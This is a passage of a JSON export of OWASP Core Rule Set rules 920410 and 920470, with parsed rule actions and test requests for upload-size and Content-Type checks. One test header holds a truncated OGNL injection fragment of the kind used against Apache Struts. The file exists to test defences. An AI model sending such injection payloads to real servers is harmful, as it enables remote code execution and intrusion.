1111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n----------111111--\n" } ] }, { "description": "", "test_id": 2, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Content-Type": "multipart/form-data; boundary=--------111111" }, "data": "----------111111\nContent-Disposition: form-data; name=\"bigfile\"; filename=\"file=.txt\"\nContent-Type: text/plain\n\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n----------111111--\n" }, "expected": { "should_block": false, "rule_ids": [ 920410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "----------111111\nContent-Disposition: form-data; name=\"bigfile\"; filename=\"file=.txt\"\nContent-Type: text/plain\n\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n----------111111--\n" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 877, "variables": [ { "variable": "TX", "variable_part": "COMBINED_FILE_SIZES", "quote_type": "no_quote", "negated": false, "counter": true } ], "operator": "@eq", "operator_argument": "1", "actions": [ { "act_name": "id", "lineno": 878, "act_quote": "no_quote", "act_arg": "920410", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 879, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 880, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 881, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 882, "act_quote": "quotes", "act_arg": "Total uploaded files size too large", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 883, "act_quote": "quotes", "act_arg": "%{MATCHED_VAR_NAME}=%{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 884, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 885, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 886, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 887, "act_quote": "quotes", "act_arg": "attack-protocol", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 888, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 889, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 890, "act_quote": "quotes", "act_arg": "OWASP_CRS/PROTOCOL-ENFORCEMENT", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 891, "act_quote": "quotes", "act_arg": "capec/1000/210/272", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 892, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 893, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "chain", "lineno": 894, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": true, "operator_negated": false, "oplineno": 877 } }, { "rule_id": null, "has_tests": false, "detection": { "variables": [ { "name": "FILES_COMBINED_SIZE", "part": "", "negated": false } ], "operator": { "type": "@gt", "argument": "%{tx.combined_file_sizes}", "negated": false } }, "transformations": [ "none" ], "metadata": {}, "attack_info": { "type": [], "severity": null, "tags": [] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 895, "variables": [ { "variable": "FILES_COMBINED_SIZE", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@gt", "operator_argument": "%{tx.combined_file_sizes}", "actions": [ { "act_name": "t", "lineno": 896, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 897, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 895 } }, { "rule_id": "920470", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_HEADERS", "part": "Content-Type", "negated": false } ], "operator": { "type": "@rx", "argument": "^[\\w/.+*-]+(?:\\s?;\\s*(?:action|boundary|charset|component|start(?:-info)?|type|version)\\s?=\\s?['\\\"\\w.()+,/:=?<>@#*-]+)*$", "negated": true } }, "transformations": [ "none", "lowercase" ], "metadata": { "phase": "1", "message": "Illegal Content-Type header", "logdata": "%{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-protocol" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-protocol", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/PROTOCOL-ENFORCEMENT", "capec/1000/255/153" ] }, "test_cases": [ { "description": "", "test_id": 1, "request": { "method": null, "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "%{(#nike='multipart/form-data').(#dm=@ognl", "Content-Length": 0, "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 920470 ] }, "malicious_patterns": [] }, { "description": "", "test_id": 2, "request": { "method": null, "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "text/plain; charset=\"UTF-8\"; garbage", "Content-Length": 0, "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 920470 ] }, "malicious_patterns": [] }, { "description": "", "test_id": 3, "request": { "method": null, "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "text/plain; charset=/gar/bage", "Content-Length": 0, "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 920470 ] }, "malicious_patterns": [] }, { "description": "", "test_id": 4, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "text/plain", "Content-Length": 0, "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 920470 ] }, "malicious_patterns": [] }, { "description": "", "test_id": 5, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "text/plain; charset=UTF-8", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 920470 ] }, "malicious_patterns": [] }, { "description": "", "test_id": 6, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "text/plain; charset=\"UTF-8\"", "Content-Length": 0, "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 920470 ] }, "malicious_patterns": [] }, { "description": "", "test_id": 7, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundary12345", "Content-Length": 0, "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 920470 ] }, "malicious_patterns": [] }, { "description": "", "test_id": 8, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "application/json", "Content-Length": 0, "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 920470 ] }, "malicious_patterns": [] }, { "description": "", "test_id": 9, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "multipart/form-data; boundary=----formdata-polyfill-0.40616634299_704013", "Content-Length": 0, "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 920470 ] }, "malicious_patterns": [] }, { "description": "", "test_id": 10, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "multipart/mixed; boundary=-----boundary_data:55780(123,45:667)+part", "Content-Length": 0, "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 920470 ] }, "malicious_patterns": [] }, { "description": "", "test_id": 11, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "multipart/mixed; boundary= gc0p4Jq0M2Yt,08/jU534c0p?==:test", "Content-Length": 0, "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 920470 ] }, "malicious_patterns": [] }, { "description": "", "test_id": 12, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "multipart/form-data; boundary= test_data_123456", "Content-Length": 0, "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 920470 ] }, "malicious_patterns": [] }, { "description": "", "test_id": 13, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "application/soap+xml; action=\"urn:hl7-org:v3:PRPA_IN201305UV02\"; charset=UTF-8", "Content-Length": 0, "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 920470 ] }, "malicious_patterns": [] }, { "description": "", "test_id": 14, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "application/soap+xml; charset=utf-8; action=\"urn:localhost-hwh#getQuestions\"", "Content-Length": 0, "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 920470 ] }, "malicious_patterns": [] }, { "description": "", "test_id": 15, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "ext/vcard;version=4.0", "Content-Length": 0, "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 920470 ] }, "malicious_patterns": [] }, { "description": "", "test_id": 16, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "application/*+json", "Content-Length": 0, "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 920470 ] }, "malicious_patterns": [] }, { "description": "Status Page Test - Illegal Content-Type header: 'text/xml; blah' where blah isn't a valid parameter for this header field", "test_id": 17, "request": { "method": null, "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "text/xml; blah", "Content-Length": 0, "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 920470 ] }, "malicious_patterns": [] } ], "raw_rule": { "type": "SecRule", "lineno": 917, "variables": [ { "variable": "REQUEST_HEADERS", "variable_part": "Content-Type", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "^[\\w/.+*-]+(?:\\s?;\\s*(?:action|boundary|charset|component|start(?:-info)?|type|version)\\s?=\\s?['\\\"\\w.()+,/:=?<>@#*-]+)*$", "actions": [ { "act_name": "id", "lineno": 918, "act_quote": "no_quote", "act_arg": "920470", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 919, "act_quote": "no_quote", "act_arg": "1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 920, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 921, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 921, "act_quote": "no_quote", "act_arg": "lowercase", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 922, "act_quote": "quotes", "act_arg": "Illegal Content-Type header", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 923, "act_quote": "quotes", "act_arg": "%{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 924, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" 